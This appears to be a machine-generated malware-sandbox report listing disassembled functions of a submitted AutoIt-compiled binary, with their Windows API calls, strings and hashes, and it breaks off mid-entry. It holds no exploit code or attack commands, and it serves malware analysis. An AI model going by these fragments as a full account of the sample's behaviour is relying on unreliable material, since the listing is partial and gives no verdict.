                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                                                                • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                • API String ID: 636576611-1287834457
                                                                                • Opcode ID: 9e773745e86bbc2722a4a5bc96e0f34ab7390154a451bf6d93f6c50a50ff3faf
                                                                                • Instruction ID: 2687b543cc9e095b3a627cbf083a50df9d6b81da31062d0d7db7bca706ee3116
                                                                                • Opcode Fuzzy Hash: 9e773745e86bbc2722a4a5bc96e0f34ab7390154a451bf6d93f6c50a50ff3faf
                                                                                • Instruction Fuzzy Hash: A761C3B06083119FD310DF54C848B6ABBEAEF48B51F00080EF9859B391D770EE49CB96
                                                                                Function 00668B02 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 149windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 005E9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 005E9BB2
                                                                                  • Part of subcall function 005E912D: GetCursorPos.USER32(?), ref: 005E9141
                                                                                  • Part of subcall function 005E912D: ScreenToClient.USER32(00000000,?), ref: 005E915E
                                                                                  • Part of subcall function 005E912D: GetAsyncKeyState.USER32(00000001), ref: 005E9183
                                                                                  • Part of subcall function 005E912D: GetAsyncKeyState.USER32(00000002), ref: 005E919D
                                                                                • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?,?), ref: 00668B6B
                                                                                • ImageList_EndDrag.COMCTL32 ref: 00668B71
                                                                                • ReleaseCapture.USER32 ref: 00668B77
                                                                                • SetWindowTextW.USER32(?,00000000), ref: 00668C12
                                                                                • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00668C25
                                                                                • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?,?), ref: 00668CFF
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                                                • String ID: @GUI_DRAGFILE$@GUI_DROPID$p#j
                                                                                • API String ID: 1924731296-3521160299
                                                                                • Opcode ID: f06f596df0e8056dc95074f92aa549d46f72a0510c307e13817584fdf0280bba
                                                                                • Instruction ID: d67ca378416e402af905541a299ad18a223957b657835bf74554b69a3ce06777
                                                                                • Opcode Fuzzy Hash: f06f596df0e8056dc95074f92aa549d46f72a0510c307e13817584fdf0280bba
                                                                                • Instruction Fuzzy Hash: 43517D70104345AFD714EF24DC5AFAA7BE6FB85714F00062EF996972A1CB71AD04CB62
                                                                                Function 00643388 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 149COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 006433CF
                                                                                  • Part of subcall function 005D9CB3: _wcslen.LIBCMT ref: 005D9CBD
                                                                                • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 006433F0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: LoadString$_wcslen
                                                                                • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                                                • API String ID: 4099089115-3080491070
                                                                                • Opcode ID: 79188160d8c9f8e4cc19538f8fb9b4b99cff5a1de474c89612e7ad9a8519272d
                                                                                • Instruction ID: 5828981aab4dad86e1ccdc21bb3772fb76c2936f21bd3a1bcd32a145e8c012df
                                                                                • Opcode Fuzzy Hash: 79188160d8c9f8e4cc19538f8fb9b4b99cff5a1de474c89612e7ad9a8519272d
                                                                                • Instruction Fuzzy Hash: 7551C37190021AAADF24EBE4CD46EEEBB7ABF54740F104066F405722A1EB712F58DF61
                                                                                Function 0063B5C8 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 142COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: _wcslen$BuffCharUpper
                                                                                • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                                                • API String ID: 1256254125-769500911
                                                                                • Opcode ID: ec78ff44404e4fd00ba710977c73a0a08e23d73c96da6041e1476ee54f5aa4c2
                                                                                • Instruction ID: dd908bad93d1ce31b0aee563342615ca599178ef9b57752c9257bf1e4fbff34b
                                                                                • Opcode Fuzzy Hash: ec78ff44404e4fd00ba710977c73a0a08e23d73c96da6041e1476ee54f5aa4c2
                                                                                • Instruction Fuzzy Hash: CB41F332A001279ACB205E7DC9925FE7BA6BBA2754F245129E621DB385E731CC81C7D0
                                                                                Function 00645393 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 103COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SetErrorMode.KERNEL32(00000001), ref: 006453A0
                                                                                • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00645416
                                                                                • GetLastError.KERNEL32 ref: 00645420
                                                                                • SetErrorMode.KERNEL32(00000000,READY), ref: 006454A7
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Error$Mode$DiskFreeLastSpace
                                                                                • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                • API String ID: 4194297153-14809454
                                                                                • Opcode ID: 67ff6af5a45fc86db349dc1e039d3596bd56b02062e8fe500ba5c7521e02e210
                                                                                • Instruction ID: df34ea42077dd93a64679dbab0a85e83b8af13cbc21152acdb305ec2ec275fa1
                                                                                • Opcode Fuzzy Hash: 67ff6af5a45fc86db349dc1e039d3596bd56b02062e8fe500ba5c7521e02e210
                                                                                • Instruction Fuzzy Hash: 8F316D35A006059FCB10DF68C488AEABBFAEF45345F148066E406DF3A2DB71DD86CB91
                                                                                Function 00663C46 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateMenu.USER32 ref: 00663C79
                                                                                • SetMenu.USER32(?,00000000), ref: 00663C88
                                                                                • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00663D10
                                                                                • IsMenu.USER32(?), ref: 00663D24
                                                                                • CreatePopupMenu.USER32 ref: 00663D2E
                                                                                • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00663D5B
                                                                                • DrawMenuBar.USER32 ref: 00663D63
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                                • String ID: 0$F
                                                                                • API String ID: 161812096-3044882817
                                                                                • Opcode ID: 3472c236989a0ab27a939e945e624f98501ae22ec9dea5f4b9798ceebf6b62f3
                                                                                • Instruction ID: e293b60c4fa45ac87f6b27b5bc410afb4029268dcf8cd9216fe39f7fd4a54d5c
                                                                                • Opcode Fuzzy Hash: 3472c236989a0ab27a939e945e624f98501ae22ec9dea5f4b9798ceebf6b62f3
                                                                                • Instruction Fuzzy Hash: 67415779A01619AFDB14DF64DC84AEA7BB6FF49350F140029F946A7360D770BA10CF94
                                                                                Function 00663A23 Relevance: 15.2, APIs: 10, Instructions: 182windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00663A9D
                                                                                • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00663AA0
                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00663AC7
                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00663AEA
                                                                                • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00663B62
                                                                                • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00663BAC
                                                                                • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00663BC7
                                                                                • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00663BE2
                                                                                • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00663BF6
                                                                                • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00663C13
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$LongWindow
                                                                                • String ID:
                                                                                • API String ID: 312131281-0
                                                                                • Opcode ID: e1719e023fbbeeb3ccc7b95db46f563078797e4e1c2049ca8d2dcdd5d4e538ba
                                                                                • Instruction ID: a532e3605bb6e83a3d939f16d3fbcb3b5c3bf4c5b7bd93d4ad5cd77964b9b679
                                                                                • Opcode Fuzzy Hash: e1719e023fbbeeb3ccc7b95db46f563078797e4e1c2049ca8d2dcdd5d4e538ba
                                                                                • Instruction Fuzzy Hash: 99617975900218AFDB10DFA8CC81EEE77B9EB4A700F10019AFA15AB3A1C774AE41DF50
                                                                                Function 0063B12F Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetCurrentThreadId.KERNEL32 ref: 0063B151
                                                                                • GetForegroundWindow.USER32(00000000,?,?,?,?,?,0063A1E1,?,00000001), ref: 0063B165
                                                                                • GetWindowThreadProcessId.USER32(00000000), ref: 0063B16C
                                                                                • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0063A1E1,?,00000001), ref: 0063B17B
                                                                                • GetWindowThreadProcessId.USER32(?,00000000), ref: 0063B18D
                                                                                • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,0063A1E1,?,00000001), ref: 0063B1A6
                                                                                • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0063A1E1,?,00000001), ref: 0063B1B8
                                                                                • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,0063A1E1,?,00000001), ref: 0063B1FD
                                                                                • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,0063A1E1,?,00000001), ref: 0063B212
                                                                                • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,0063A1E1,?,00000001), ref: 0063B21D
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                • String ID:
                                                                                • API String ID: 2156557900-0
                                                                                • Opcode ID: e803eb4aab7e4407211437e906204a3121f10bd87a0b8e68fdf8ba2306de1867
                                                                                • Instruction ID: 1f8677ab8368066cf292dcebb59de1a1ce4ffea70337c75d784e1184b16d6956
                                                                                • Opcode Fuzzy Hash: e803eb4aab7e4407211437e906204a3121f10bd87a0b8e68fdf8ba2306de1867
                                                                                • Instruction Fuzzy Hash: C9319C71500614BFDB10AF24DC49BBEBBABBB52321F146115FA02D6390D7B5AA408FA4
                                                                                Function 00602C80 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _free.LIBCMT ref: 00602C94
                                                                                  • Part of subcall function 006029C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0060D7D1,00000000,00000000,00000000,00000000,?,0060D7F8,00000000,00000007,00000000,?,0060DBF5,00000000), ref: 006029DE
                                                                                  • Part of subcall function 006029C8: GetLastError.KERNEL32(00000000,?,0060D7D1,00000000,00000000,00000000,00000000,?,0060D7F8,00000000,00000007,00000000,?,0060DBF5,00000000,00000000), ref: 006029F0
                                                                                • _free.LIBCMT ref: 00602CA0
                                                                                • _free.LIBCMT ref: 00602CAB
                                                                                • _free.LIBCMT ref: 00602CB6
                                                                                • _free.LIBCMT ref: 00602CC1
                                                                                • _free.LIBCMT ref: 00602CCC
                                                                                • _free.LIBCMT ref: 00602CD7
                                                                                • _free.LIBCMT ref: 00602CE2
                                                                                • _free.LIBCMT ref: 00602CED
                                                                                • _free.LIBCMT ref: 00602CFB
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                • String ID:
                                                                                • API String ID: 776569668-0
                                                                                • Opcode ID: 85fef346c535f288309e4060a1ea722b2f831f2609e3f17c6314a2b332e34836
                                                                                • Instruction ID: 68fccbbe7df5b585ea8181556d0a592cc3da6132ceeb441d13e58c3a6764b0a7
                                                                                • Opcode Fuzzy Hash: 85fef346c535f288309e4060a1ea722b2f831f2609e3f17c6314a2b332e34836
                                                                                • Instruction Fuzzy Hash: 87112B36140009BFCB4AEF55D856CDE3BAAFF05740F5048A8F9485F272D631EE509B94
                                                                                Function 005D1410 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 332comCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 005D1459
                                                                                • OleUninitialize.OLE32(?,00000000), ref: 005D14F8
                                                                                • UnregisterHotKey.USER32(?), ref: 005D16DD
                                                                                • DestroyWindow.USER32(?), ref: 006124B9
                                                                                • FreeLibrary.KERNEL32(?), ref: 0061251E
                                                                                • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0061254B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                • String ID: close all
                                                                                • API String ID: 469580280-3243417748
                                                                                • Opcode ID: 0bb8435564c078151af4c306728c68469bd2681bff2332462cebc45a163caf98
                                                                                • Instruction ID: 5895fe6c6cfae3f25d7ebed209473f0b1c5ddb1aeb7784882b9cba4c1cbc290c
                                                                                • Opcode Fuzzy Hash: 0bb8435564c078151af4c306728c68469bd2681bff2332462cebc45a163caf98
                                                                                • Instruction Fuzzy Hash: 71D18E307016139FCB29EF19C4A9AA9FBA6BF45710F14419EE44AAB351CB30ED62CF54
                                                                                Function 005D5BEA Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 184windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SetWindowLongW.USER32(?,000000EB), ref: 005D5C7A
                                                                                  • Part of subcall function 005D5D0A: GetClientRect.USER32(?,?), ref: 005D5D30
                                                                                  • Part of subcall function 005D5D0A: GetWindowRect.USER32(?,?), ref: 005D5D71
                                                                                  • Part of subcall function 005D5D0A: ScreenToClient.USER32(?,?), ref: 005D5D99
                                                                                • GetDC.USER32 ref: 006146F5
                                                                                • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00614708
                                                                                • SelectObject.GDI32(00000000,00000000), ref: 00614716
                                                                                • SelectObject.GDI32(00000000,00000000), ref: 0061472B
                                                                                • ReleaseDC.USER32(?,00000000), ref: 00614733
                                                                                • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 006147C4
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                • String ID: U
                                                                                • API String ID: 4009187628-3372436214
                                                                                • Opcode ID: 3c7e5b60904d353303571b403a8732dfc511080f96a51a8c158ebd71c51899ee
                                                                                • Instruction ID: ddfc960d4ed7141d0b819b8bc971a4565d986311ee431bdf3f5564557c40612b
                                                                                • Opcode Fuzzy Hash: 3c7e5b60904d353303571b403a8732dfc511080f96a51a8c158ebd71c51899ee
                                                                                • Instruction Fuzzy Hash: F271EE30500205DFCF218F68C984AFA3BB7FF4A325F18426AE9555B2A6DB319C81DF60
                                                                                Function 0064359C Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 150COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 006435E4
                                                                                  • Part of subcall function 005D9CB3: _wcslen.LIBCMT ref: 005D9CBD
                                                                                • LoadStringW.USER32(006A2390,?,00000FFF,?), ref: 0064360A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: LoadString$_wcslen
                                                                                • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                • API String ID: 4099089115-2391861430
                                                                                • Opcode ID: 2e066acf4d152c866cdb5468777797194f1dea6eb602119ededdd38bcf3b6311
                                                                                • Instruction ID: 9b88dbae819ee5f896fbb66799d8a535925798eace97b0c9a9a0d9ad2e86ac94
                                                                                • Opcode Fuzzy Hash: 2e066acf4d152c866cdb5468777797194f1dea6eb602119ededdd38bcf3b6311
                                                                                • Instruction Fuzzy Hash: D151A37180021ABBDF24EBA4DC46EEEBB7ABF45300F144126F105722A1DB301B95DFA5
                                                                                Function 0064C253 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94networkCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0064C272
                                                                                • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0064C29A
                                                                                • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0064C2CA
                                                                                • GetLastError.KERNEL32 ref: 0064C322
                                                                                • SetEvent.KERNEL32(?), ref: 0064C336
                                                                                • InternetCloseHandle.WININET(00000000), ref: 0064C341
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                                • String ID:
                                                                                • API String ID: 3113390036-3916222277
                                                                                • Opcode ID: d162ce8ba685d472b33129d302cc15aece2cd5eddc487a27af680bf56fa8bde2
                                                                                • Instruction ID: 863ee70b6bee281cc6e6608e8ffd2bb2dee60bbb668c66138a6019a83629f9c4
                                                                                • Opcode Fuzzy Hash: d162ce8ba685d472b33129d302cc15aece2cd5eddc487a27af680bf56fa8bde2
                                                                                • Instruction Fuzzy Hash: BD31B1B1601604AFD7629F648C88ABB7BFEEF49760F00851DF48692300DB70DD059B60
                                                                                Function 0063989B Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 74windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00613AAF,?,?,Bad directive syntax error,0066CC08,00000000,00000010,?,?,>>>AUTOIT SCRIPT<<<), ref: 006398BC
                                                                                • LoadStringW.USER32(00000000,?,00613AAF,?), ref: 006398C3
                                                                                  • Part of subcall function 005D9CB3: _wcslen.LIBCMT ref: 005D9CBD
                                                                                • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00639987
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
